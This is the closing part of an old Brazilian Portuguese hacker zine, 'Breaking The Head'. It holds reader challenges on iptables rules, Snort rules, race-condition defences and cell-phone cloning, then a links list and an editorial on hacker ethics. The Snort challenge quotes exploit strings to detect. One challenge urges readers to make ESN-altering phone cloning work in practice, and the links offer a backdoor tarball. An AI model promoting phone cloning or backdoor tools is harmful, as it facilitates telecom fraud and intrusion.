    [--- Por Hophet         ---]
    [--------------------------]
                           \.... 
                            \...
                             \..
                              \.
                               \



1 - Introducao.
2 - Desafio Firewall.
3 - Desafio IDS.
4 - Desafio RC.
5 - Desafio Clonagem.
6 - Finalizando.




1 - Introducao.
---------------


Ola! O objetivo desta secao eh acima de tudo fazer o fucador colocar
em pratica um pouco daquilo que ele aprendeu com a edicao, promovendo
alguns desafios com algumas materias da edicao corrente, as possiveis 
solucoes devem ser enviadas para o email "hophet@yahoo.com.br" e serao
publicadas na edicao sequinte da zine, nesta mesma secao. Vamos comecar
com algumas coisas simples, mas no decorrer das edicoes o negocio vai
comecar a ficar bravo:). Desafios que os leitores nao solucionarem,seram
publicados pelo pessoal da Bth. Mas nao se apoie em ninguem ou espere 
serem publicados por nos, mas sim "quebre a cabeca" uns minutinhos e 
tente resolver voce mesmo e eh claro manda sua solucao para nos:).
Um abraco e uma boa sorte!!!



2 - Desafio Firewall.
---------------------

Baseado na materia sobre Firewall(mat. [2]) crie regras com o Iptables
para as seguintes requisicoes:

1 - Um acesso da Rede interna 10.10.0.1/20 aos servicos de email do server 
de email 10.10.0.21 

2 - Permitir acesso FTP para a maquina 10.10.0.2, para qualquer endereco
destino.

3 - Permitir acesso FTP de qualquer endereco origem, para o endereco 
10.10.0.22

4 - Um acesso da Rede interna 10.10.0.1/20 aos servicos HTTP do server
10.10.0.23 



3 - Desafio IDS.
----------------

Com base nas informacoes sobre a materia IDS(mat. [3]) crie algumas 
regras para o Snort pedidas abaixo:

1 - Crie uma regra que barre tentativas de Scans Stealth.

2 - Crie uma regra que barre uma tentativa de exploitacao que contesse
a string "sh root.sh 0%s200" em coneccoes na porta  21.

3 - Crie uma regra que barre tentativas de exploitacao que contenha 
a string "Remoting Exploration" e o Flag "RE2" na porta 23.



4 - Desafio RC.
---------------

Eh, esse aqui eh legal:). Tente baseado na materia sobre Race Condition
formar uma outra maneira de se proteger contra aquele tipo de exploitacao
criando ou uma outra funcao ou outros programas para fazer tal coisa, nao
vale pegar a solucao da materia:). Tente de varias formas ate que encontre
uma maneira eficaz de se proteger contra RC em funcoes que manipulam 
arquivos sem usar mudanca do codigo com bug na materia. Crie seus metodos
e solucoes, desenvolva sua defesa para este problema. Existem varios 
modos, voce soh preciza achalos:).  



5 - Desafio Clonagem.
---------------------

Este aqui tb eh legal hehe:)! Basicamente voce deve testar, tentar, 
fazer o possivel e o impossivel para tornar a teoria da materia 
sobre Clonagem de Celulares (mat. [6]) uma coisa real e funcional,
ou seja, fazela ser praticavel:). A teoria eh o 3o item do topico
"Possiveis Maneiras de se alterar o ESN". O objetivo deste desafio 
eh fazer com que a comunidade "Phreaker" e todos que gostem ou queira
ajudar, trabalhem juntos em uma coisa que com certeza ira trazer um
grande rebulico na telefonia brasileira e talvez mundial, e eh claro
um crescimento maior do "Phreaking" no brasil. Esta eh uma excessao
e talvez nao saia uma solucao na proxima edicao:).
 


6 - Finalizando.
----------------

Eh pessoal, espero recerber varios email do pessoal contribuindo 
mais com nos da bth com suas solucoes. Mandem. Boa sorte em suas
aventuras pelos desafios, qualquer duvida mail-me.


Um abraco.


Hophet a.k.a Pol Meyen. 





[10] .
     .\
     ..\
     ...\
     ....\ 
     [------------------]
     [--- Links      ---]
     [--- Por Hophet ---]
     [------------------]
                    \....
                     \...
                      \..
                       \.
                        \




Aih vao alguns links, uns tem haver com as materias
outros nao. Aih estao: 

Snort
http://www.snort.org

lmail - RC
http://hophet.hobbiton.org/lmail.tar.gz

LinModens 
http://www.linmodens.org

JcMp3 - Drivers de Modens pra linux
http://www.jcmp3.cjb.net

Backdoor Chagas v0.2
http://hophet.hobbiton.org/bdchagas-0.2.tar.gz

Hp pessoal - Bth
http://hophet.hobbiton.org

SecurityFocus
http://www.securityfocus.org

AntiHack0s
http://www.antihack0s.cjb.net

Phreakhaos
http://www.phreakhaos.cjb.net

Unsekurity Scene
http://unsekurity.virtualave.net


Quer ver o seu link aih em cima??! mail-me:)





[11] .
     .\
     ..\
     ...\ 
     ....\
     [------------------]
     [--- Terminando ---]
     [--- Por Hophet ---]
     [------------------]
                    \....
                     \...
                      \..
                       \.
                        \     




Eh, chegamos mas uma vez ao final de mais uma edicao da Bth, e 
acreditem eh gratificante, ver que pessoas estao usufruindo desta
"liberdade". Espero que tenham gostado da edicao, sinceramente 
achei que ficou melhor que a 00:), mas eh assim mesmo, sempre
melhorando e crescendo mais, juntamente com voces, espero
que seja assim mesmo, que a cada edicao que passe fique melhor 
em tudo, conteudo, interacao com os fucadores, etc,etc,etc.
Espero tambem receber mais a ajuda dos Fucadores eticos da 
"comunidade" para que realmente a "liberdade de informacao"
seja pregada em outras tribos e nacoes:).
Quero dizer que nao eh facil se comprometer em escrever a voces,
mas eh um trabalho que presiza ser feito, e ele tem sido 
recompensado por esse esforco. A Bth desde o inicio como disse 
na edicao 00 tem se comprometido a trazer a comunidade informacoes
algumas vezes exclusivas, pois eh esse o maior objetivo da bth,
nao ser soh mais uma e sim, sermos a "bth" onde os fucadores 
newbies encontram apoio, assim como lutamos para que o elitismo
venha cair por terra, e que a "liberdade" venha reinar nesses 
tempos de pura monopolizacao por parte das "grandes". A Etica deve
ser seguida, com consciencia e razao, e que a banda podre e os 
Skiddies possam ver, possam abrir os olhos e ver o qto eles estao
errados em abominar a etica, pois suas "ideologias" sao erradas
e sem fundamentos. Eu vejo tambem muitos dizendo que o "hacking"
eh uma brincadeira, que eh pura diversao, eu os digo, voces nao
tem visao da "realidade" e do verdadeiro hacking, sao cegos ou
apenas nao querem ver, o hacking eh um estilo de vida, eh voce 
viver por isso, para muitos de nos, eh "tudo". Que todos venham
enxergar isso! Que Deus os Abencoe!!!

Como tb ja foi dito a zine continua sem data marcada pra sair
os porques disto tb ja foram ditos, espero que compreendam,
mas nao passa de 2 meses nao ... eh ate menos.:)

Continuo dizendo que quem tiver o interece de ajudar a bth com
seus txts fiquem avontade para manda-los para min, eu agradeco
desde jah. Claro que passaram por avaliacoes, mas isso se faz
necessario, para uma melhor organizacao do nosso trabalho.

Ahh, a zine agora tb tah na pagina "hophet.hobbiton.org" 
tou acertando ainda a page ... mas vai fica legal.:)

Quero agradecer a todos que vem me ajudando com a Bth, escrevendo,
dando o apoio emocional,etc:), mando um abraco a Blood_Sucker que
tem dado moh mao aqui a KeeP que tambem tem ajudado pacas, ele ia
escrever nessa edicao, mas o Pai dele teve uns problemas e ele nao
pode, edicao que vem ele escreve:), mas mano tamos com voce cara,
pode contas conosco, um abraco. Um abraco a todo o pessoal da 
Unsekurity Scene. 

Ate mais pessoal, um abraco a todos os leitores, mandem suas
opinioes, quero saber em que podemos melhorar. 
Estou indo metaforicamente, metafisicamente e literalmente:)
Ate a proxima pessoal!!!

"Se eu for ligar pro que eh que vao falar nao faco nada..."



printk("<1> End Of File\n");



            _____
           |     \
  !!!!!    | BTH  >
 c[0_o]    |_____/
   `U' \   |
      --|--|
        |
       / \




.............................\!!!!/.............................
............................(   ).............................
...............---------oOOO--(_)-----------------..............
...............|.................................|..............
...............|.......hophet@yahoo.com.br.......|..............
...............|........Breaking.The.Head........|..............
...............|.................................|..............
...............-----------------------oOOO--------..............
...........................|__|.|__|............................
............................||...||............................. 
...........................ooO...Ooo............................ 
.



